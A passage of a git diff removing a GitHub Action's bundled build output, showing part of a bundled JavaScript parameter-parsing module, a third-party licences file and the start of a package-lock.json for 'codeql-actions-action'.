'\x2e', '%2E': '\x2e', '%2f': '\x2f', - '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', - 
'%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', - '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', - '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', - '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', - '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', - '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', - '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', - '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', - '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', - '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', - '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', - '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', - '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', - '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', - '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', - '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', - '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', - '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', - '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', - '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', - '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', - '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', - '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', - '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', - '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', - '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', 
- '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', - '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', - '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', - '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', - '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', - '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', - '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', - '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', - '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', - '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', - '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', - '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', - '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', - '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', - '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', - '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', - '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', - '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', - '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', - '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', - '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', - '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', - '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', - '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', - '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', - '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': 
'\xca', - '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', - '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', - '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', - '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', - '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', - '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', - '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', - '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', - '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', - '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', - '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', - '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', - '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', - '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', - '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', - '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', - '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', - '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', - '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', - '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', - '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', - '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', - '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', - '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', - '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', - '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', 
'%F9': '\xf9', - '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', - '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', - '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', - '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', - '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' -} - -function encodedReplacer (match) { - return EncodedLookup[match] -} - -const STATE_KEY = 0 -const STATE_VALUE = 1 -const STATE_CHARSET = 2 -const STATE_LANG = 3 - -function parseParams (str) { - const res = [] - let state = STATE_KEY - let charset = '' - let inquote = false - let escaping = false - let p = 0 - let tmp = '' - const len = str.length - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - const char = str[i] - if (char === '\\' && inquote) { - if (escaping) { escaping = false } else { - escaping = true - continue - } - } else if (char === '"') { - if (!escaping) { - if (inquote) { - inquote = false - state = STATE_KEY - } else { inquote = true } - continue - } else { escaping = false } - } else { - if (escaping && inquote) { tmp += '\\' } - escaping = false - if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { - if (state === STATE_CHARSET) { - state = STATE_LANG - charset = tmp.substring(1) - } else { state = STATE_VALUE } - tmp = '' - continue - } else if (state === STATE_KEY && - (char === '*' || char === '=') && - res.length) { - state = char === '*' - ? 
STATE_CHARSET - : STATE_VALUE - res[p] = [tmp, undefined] - tmp = '' - continue - } else if (!inquote && char === ';') { - state = STATE_KEY - if (charset) { - if (tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } - charset = '' - } else if (tmp.length) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } - tmp = '' - ++p - continue - } else if (!inquote && (char === ' ' || char === '\t')) { continue } - } - tmp += char - } - if (charset && tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } else if (tmp) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - - if (res[p] === undefined) { - if (tmp) { res[p] = tmp } - } else { res[p][1] = tmp } - - return res -} - -module.exports = parseParams - - -/***/ }) - -/******/ }); -/************************************************************************/ -/******/ // The module cache -/******/ var __webpack_module_cache__ = {}; -/******/ -/******/ // The require function -/******/ function __nccwpck_require__(moduleId) { -/******/ // Check if module is in cache -/******/ var cachedModule = __webpack_module_cache__[moduleId]; -/******/ if (cachedModule !== undefined) { -/******/ return cachedModule.exports; -/******/ } -/******/ // Create a new module (and put it into the cache) -/******/ var module = __webpack_module_cache__[moduleId] = { -/******/ // no module.id needed -/******/ // no module.loaded needed -/******/ exports: {} -/******/ }; -/******/ -/******/ // Execute the module function -/******/ var threw = true; -/******/ try { -/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); -/******/ threw = false; -/******/ } finally { -/******/ if(threw) delete __webpack_module_cache__[moduleId]; -/******/ } -/******/ -/******/ // Return the exports of the module -/******/ return module.exports; -/******/ } 
-/******/ -/************************************************************************/ -/******/ /* webpack/runtime/compat */ -/******/ -/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; -/******/ -/************************************************************************/ -/******/ -/******/ // startup -/******/ // Load entry module and return exports -/******/ // This entry module is referenced by other modules so it can't be inlined -/******/ var __webpack_exports__ = __nccwpck_require__(6144); -/******/ module.exports = __webpack_exports__; -/******/ -/******/ })() -; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt deleted file mode 100644 index cd36a2d85ef..00000000000 --- a/.github/action/dist/licenses.txt +++ /dev/null 
@@ -1,175 +0,0 @@ -@actions/core -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/exec -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/http-client -MIT -Actions Http Client for Node.js - -Copyright (c) GitHub, Inc. - -All rights reserved. - -MIT License - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and -associated documentation files (the "Software"), to deal in the Software without restriction, -including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT -LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN -NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
- - -@actions/io -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/tool-cache -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@fastify/busboy -MIT -Copyright Brian White. All rights reserved. - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to -deal in the Software without restriction, including without limitation the -rights to use, copy, modify, merge, publish, distribute, sublicense, and/or -sell copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS -IN THE SOFTWARE. - -semver -ISC -The ISC License - -Copyright (c) Isaac Z. Schlueter and Contributors - -Permission to use, copy, modify, and/or distribute this software for any -purpose with or without fee is hereby granted, provided that the above -copyright notice and this permission notice appear in all copies. - -THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR -IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - - -tunnel -MIT -The MIT License (MIT) - -Copyright (c) 2012 Koichi Kobayashi - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. 
- - -undici -MIT -MIT License - -Copyright (c) Matteo Collina and Undici contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -uuid -MIT -The MIT License (MIT) - -Copyright (c) 2010-2020 Robert Kieffer and other contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
- -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json deleted file mode 100644 index 9cacb7f9af9..00000000000 --- a/.github/action/package-lock.json +++ /dev/null 
@@ -1,639 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "codeql-actions-action", - "version": "0.1.0", - "license": "MIT", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } - }, - "node_modules/@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "node_modules/@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "dependencies": { - "@actions/io": "^1.0.1" - } - }, - "node_modules/@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "node_modules/@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "dependencies": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "node_modules/@actions/io": { - "version": "1.1.3", - "resolved": 
"https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "node_modules/@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "dependencies": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - } - }, - "node_modules/@actions/tool-cache/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", - "engines": { - "node": ">=14" - } - }, - "node_modules/@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "dependencies": { - "@octokit/types": "^6.0.3" - } - }, - "node_modules/@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "dependencies": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "dependencies": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "dependencies": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - 
"node_modules/@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "node_modules/@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "dependencies": { - "@octokit/types": "^6.40.0" - }, - "peerDependencies": { - "@octokit/core": ">=2" - } - }, - "node_modules/@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": 